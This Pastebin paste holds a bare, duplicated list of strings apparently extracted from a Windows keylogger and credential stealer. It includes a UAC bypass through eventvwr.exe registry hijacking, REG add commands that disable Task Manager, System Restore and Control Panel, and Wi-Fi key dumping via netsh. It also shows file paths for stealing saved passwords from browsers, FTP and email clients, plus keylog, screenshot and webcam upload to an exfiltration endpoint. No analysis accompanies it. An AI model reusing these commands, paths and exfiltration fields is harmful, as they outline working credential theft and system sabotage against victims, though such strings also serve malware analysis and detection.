Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- Windows\System32\WindowsPowerShell\v1.0\powershell.exe
- SOFTWARE\Classes\mscfile\shell\open\command
- eventvwr.exe
- SOFTWARE\Classes\mscfile
- Windows 7
- Windows 8
- Windows 10
- 0
- %startupfolder%
- \%insfolder%\
- SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run
- Shutdown -r -t 5
- True
- Player
- temp
- \
- .exe
- Johnson
- Miller
- michael
- Abby
- Emily
- John
- Length
- root\CIMV2
- type={0}
- hwid={1}
- time={2}
- pcname={3}
- logdata={4}
- screen={5}
- ipadd={6}
- webcam_link={7}
- client={8}
- link={9}
- username={10}
- password={11}
- screen_link={12}
- site_username={13}
- webcam
- /
- Webcam Capture From:
- https://api.imgur.com/3/upload.xml
- \ScreenShot
- \ScreenShot\screen.jpeg
- screenshots
- Screen Capture From:
- Screenshot_
- /log.tmp
- keylog
- [SavedLog (
- [Saved Log]
- Keystrokes From:
- <html><span style=font-family:Courier New;font-size:14px;font-style:normal;font-weight:bold;text-decoration:none;text-transform:none;color:#000000;>Local Time :
- </span></html>
- Keystrokes_
- update
- info
- uninstall
- type={0}
- hwid={1}
- time={2}
- pcname={3}
- logdata={4}
- screen={5}
- ipadd={6}
- webcam_link={7}
- screen_link={8}
- site_username={9}
- [passwords]
- passwords
- Count
- HKEY_CURRENT_USER\Software\FTPWare\COREFTP\Sites\
- Host
- REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
- HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System
- DisableCMD
- REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoControlPanel /t REG_DWORD /d 1 /f
- HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRestore
- DisableSR
- REG add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoFolderOptions /t REG_DWORD /d 1 /f
- E+MTWs/(En()a3456d3h99sdf9sjdgA&%/+vkm&FGNBDSFs5(TRS%cxv
- p=
- %PostURL%/api.php
- application/x-www-form-urlencoded
- http://checkip.dyndns.org/
- <font color=#008000>{BACK}</font>
- </font>
- <font color=#008000>{ALT+F4}</font>
- <font color=#008000>{ESC}</font>
- <font color=#008000>{CAPSLOCK}</font>
- <font color=#008000>↓</font>
- <font color=#008000>→</font>
- <font color=#008000>{END}</font>
- <font color=#008000>{Insert}</font>
- <font color=#008000>{PageDown}</font>
- <font color=#008000>{ENTER}</font>
- <font color=#008000>{F1}</font>
- <font color=#008000>{F2}</font>
- <font color=#008000>{F3}</font>
- <font color=#008000>{F4}</font>
- <font color=#008000>{F5}</font>
- <font color=#008000>{F6}</font>
- <font color=#008000>{F7}</font>
- <font color=#008000>{F8}</font>
- <font color=#008000>{F9}</font>
- <font color=#008000>{F11}</font>
- <font color=#008000>{CTRL}</font>
- .lnk
- WScript.Shell
- CreateShortcut
- TargetPath
- cmd.exe
- WorkingDirectory
- Arguments
- /c start
- " "
- &start
- & exit
- IconLocation
- Save
- .lnk
- &explorer /root,"%CD%
- " & exit
- Opera Software\Opera Stable\Login Data
- Opera
- encryptedUsername)":"(.*?)"
- Firefox
- IELibrary
- IELibrary.InternetExplorer
- GetSavedPasswords
- URL
- UserName
- Password
- Browser
- \Apple Computer\Preferences\keychain.plist
- seamonkey
- SeaMonkey
- MapleStudio\ChromePlus\User Data\Default\Login Data
- CoolNovo
- Torch\User Data\Default\Login Data
- Torch Browser
- UCBrowser\
- *
- Login Data
- journal
- UC Browser
- wow_logins
- All User Profile * : (?<profile>.*)
- profile
- Wi-Fi
- wlan show profile name="
- " key=clear
- Key Content * : (?<password>.*)
- password
- No Password!
- ALLUSERSPROFILE
- \\
- DynDNS\Updater\config.dyndns
- username=
- =
- password=
- &H
- t6KzXhCh
- http://DynDns.com
- DynDNS
- \FileZilla\recentservers.xml
- <Server>
- <Host>
- </Host>
- :
- <Port>
- </Port>
- <User>
- </User>
- <Pass encoding="base64">
- </Pass>
- <Pass>
- FileZilla
- \jDownloader\config\database.script
- programfiles(x86)
- HKEY_CURRENT_USER\Software\Paltalk\
- pwd
- http://Paltalk.com
- Paltalk
- \.purple\accounts.xml
- <account>
- <protocol>
- </protocol>
- <name>
- </name>
- <password>
- </password>
- Pidgin
- SmartFTPClient 2.0FavoritesQuick Connect*.xml
- <Password>
- </Password>
- <Name>
- </Name>
- SmartFTP
- HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\FTP Commander\UninstallString
- uninstall.exe
- Ftplist.txt
- ;Server=
- ;Port=
- ;Password=
- ;User=
- ;Anonymous=
- Name=
- FTPCommander
- HKEY_CURRENT_USER\SOFTWARE\Vitalwerks\DUC
- USERname
- http://no-ip.com
- NO-IP
- +-0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz
- Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
- Software\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676
- HKEY_CURRENT_USER\Software\Aerofox\FoxmailPreview
- Executable
- \VirtualStore\Program Files\Foxmail\mail\
- ';:,<>/?+=
- \Pocomail\accounts.ini
- POPPass
- SMTPPass
- SMTP
- PocoMail
- No data!
- [
- ]
- ;
- <array>
- <dict>
- <string>
- </string>
- <data>
- </data>
- Safari Browser
- -convert xml1 -s -o "
- \fixed_keychain.xml"
- A
- 10
- B
- 11
- C
- 12
- D
- 13
- E
- 14
- F
- 15
- ABCDEF
- PK11_GetInternalKeySlot
- PK11_FreeSlot
- ATOB_ConvertAsciiToItem_Util
- ATOB_ConvertAsciiToItem
- PK11SDR_Decrypt
- NSS_Shutdown
- PK11_Authenticate
- PROGRAMFILES(x86)
- \Mozilla Firefox\nss3.dll
- \Mozilla Firefox\
- PROGRAMFILES
- \Postbox\nss3.dll
- \Postbox\
- \Mozilla Thunderbird\nss3.dll
- \Mozilla Thunderbird\
- \SeaMonkey\nss3.dll
- \SeaMonkey\
- \Flock\nss3.dll
- \Flock\
- \vcruntime140.dll
- mozglue.dll
- nss3.dll
- NSS_Init
- Password could not decrypted.
- Copy
- An error occurred!
- \Mozilla\Firefox\
- Path=([A-z0-9\/\.]+)
- profiles.ini
- \Mozilla\SeaMonkey\
- \Flock\Browser\
- \Thunderbird\
- (
- IndexOf
- UNIQUE
- table
- No Data
- RegRead
- Windows\System32\WindowsPowerShell\v1.0\powershell.exe
- SOFTWARE\Classes\mscfile\shell\open\command
- eventvwr.exe
- SOFTWARE\Classes\mscfile
- Windows 7
- Windows 8
- Windows 10
- 0
- %startupfolder%
- \%insfolder%\
- SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run
- Shutdown -r -t 5
- True
- Player
- temp
- \
- .exe
- Johnson
- Miller
- michael
- Abby
- Emily
- John
- Length
- root\CIMV2
- type={0}
- hwid={1}
- time={2}
- pcname={3}
- logdata={4}
- screen={5}
- ipadd={6}
- webcam_link={7}
- client={8}
- link={9}
- username={10}
- password={11}
- screen_link={12}
- site_username={13}
- webcam
- /
- Webcam Capture From:
- https://api.imgur.com/3/upload.xml
- \ScreenShot
- \ScreenShot\screen.jpeg
- screenshots
- Screen Capture From:
- Screenshot_
- /log.tmp
- keylog
- [SavedLog (
- [Saved Log]
- Keystrokes From:
- <html><span style=font-family:Courier New;font-size:14px;font-style:normal;font-weight:bold;text-decoration:none;text-transform:none;color:#000000;>Local Time :
- </span></html>
- Keystrokes_
- update
- info
- uninstall
- type={0}
- hwid={1}
- time={2}
- pcname={3}
- logdata={4}
- screen={5}
- ipadd={6}
- webcam_link={7}
- screen_link={8}
- site_username={9}
- [passwords]
- passwords
- Count
- HKEY_CURRENT_USER\Software\FTPWare\COREFTP\Sites\
- Host
- REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
- HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System
- DisableCMD
- REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoControlPanel /t REG_DWORD /d 1 /f
- HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRestore
- DisableSR
- REG add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoFolderOptions /t REG_DWORD /d 1 /f
- E+MTWs/(En()a3456d3h99sdf9sjdgA&%/+vkm&FGNBDSFs5(TRS%cxv
- p=
- %PostURL%/api.php
- application/x-www-form-urlencoded
- http://checkip.dyndns.org/
- <font color=#008000>{BACK}</font>
- </font>
- <font color=#008000>{ALT+F4}</font>
- <font color=#008000>{ESC}</font>
- <font color=#008000>{CAPSLOCK}</font>
- <font color=#008000>↓</font>
- <font color=#008000>→</font>
- <font color=#008000>{END}</font>
- <font color=#008000>{Insert}</font>
- <font color=#008000>{PageDown}</font>
- <font color=#008000>{ENTER}</font>
- <font color=#008000>{F1}</font>
- <font color=#008000>{F2}</font>
- <font color=#008000>{F3}</font>
- <font color=#008000>{F4}</font>
- <font color=#008000>{F5}</font>
- <font color=#008000>{F6}</font>
- <font color=#008000>{F7}</font>
- <font color=#008000>{F8}</font>
- <font color=#008000>{F9}</font>
- <font color=#008000>{F11}</font>
- <font color=#008000>{CTRL}</font>
- .lnk
- WScript.Shell
- CreateShortcut
- TargetPath
- cmd.exe
- WorkingDirectory
- Arguments
- /c start
- " "
- &start
- & exit
- IconLocation
- Save
- .lnk
- &explorer /root,"%CD%
- " & exit
- Opera Software\Opera Stable\Login Data
- Opera
- encryptedUsername)":"(.*?)"
- Firefox
- IELibrary
- IELibrary.InternetExplorer
- GetSavedPasswords
- URL
- UserName
- Password
- Browser
- \Apple Computer\Preferences\keychain.plist
- seamonkey
- SeaMonkey
- MapleStudio\ChromePlus\User Data\Default\Login Data
- CoolNovo
- Torch\User Data\Default\Login Data
- Torch Browser
- UCBrowser\
- *
- Login Data
- journal
- UC Browser
- wow_logins
- All User Profile * : (?<profile>.*)
- profile
- Wi-Fi
- wlan show profile name="
- " key=clear
- Key Content * : (?<password>.*)
- password
- No Password!
- ALLUSERSPROFILE
- \\
- DynDNS\Updater\config.dyndns
- username=
- =
- password=
- &H
- t6KzXhCh
- http://DynDns.com
- DynDNS
- \FileZilla\recentservers.xml
- <Server>
- <Host>
- </Host>
- :
- <Port>
- </Port>
- <User>
- </User>
- <Pass encoding="base64">
- </Pass>
- <Pass>
- FileZilla
- \jDownloader\config\database.script
- programfiles(x86)
- HKEY_CURRENT_USER\Software\Paltalk\
- pwd
- http://Paltalk.com
- Paltalk
- \.purple\accounts.xml
- <account>
- <protocol>
- </protocol>
- <name>
- </name>
- <password>
- </password>
- Pidgin
- SmartFTPClient 2.0FavoritesQuick Connect*.xml
- <Password>
- </Password>
- <Name>
- </Name>
- SmartFTP
- HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\FTP Commander\UninstallString
- uninstall.exe
- Ftplist.txt
- ;Server=
- ;Port=
- ;Password=
- ;User=
- ;Anonymous=
- Name=
- FTPCommander
- HKEY_CURRENT_USER\SOFTWARE\Vitalwerks\DUC
- USERname
- http://no-ip.com
- NO-IP
- +-0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz
- Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
- Software\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676
- HKEY_CURRENT_USER\Software\Aerofox\FoxmailPreview
- Executable
- \VirtualStore\Program Files\Foxmail\mail\
- ';:,<>/?+=
- \Pocomail\accounts.ini
- POPPass
- SMTPPass
- SMTP
- PocoMail
- No data!
- [
- ]
- ;
- <array>
- <dict>
- <string>
- </string>
- <data>
- </data>
- Safari Browser
- -convert xml1 -s -o "
- \fixed_keychain.xml"
- A
- 10
- B
- 11
- C
- 12
- D
- 13
- E
- 14
- F
- 15
- ABCDEF
- PK11_GetInternalKeySlot
- PK11_FreeSlot
- ATOB_ConvertAsciiToItem_Util
- ATOB_ConvertAsciiToItem
- PK11SDR_Decrypt
- NSS_Shutdown
- PK11_Authenticate
- PROGRAMFILES(x86)
- \Mozilla Firefox\nss3.dll
- \Mozilla Firefox\
- PROGRAMFILES
- \Postbox\nss3.dll
- \Postbox\
- \Mozilla Thunderbird\nss3.dll
- \Mozilla Thunderbird\
- \SeaMonkey\nss3.dll
- \SeaMonkey\
- \Flock\nss3.dll
- \Flock\
- \vcruntime140.dll
- mozglue.dll
- nss3.dll
- NSS_Init
- Password could not decrypted.
- Copy
- An error occurred!
- \Mozilla\Firefox\
- Path=([A-z0-9\/\.]+)
- profiles.ini
- \Mozilla\SeaMonkey\
- \Flock\Browser\
- \Thunderbird\
- (
- IndexOf
- UNIQUE
- table
- No Data
- RegRead
Add Comment
Please, Sign In to add comment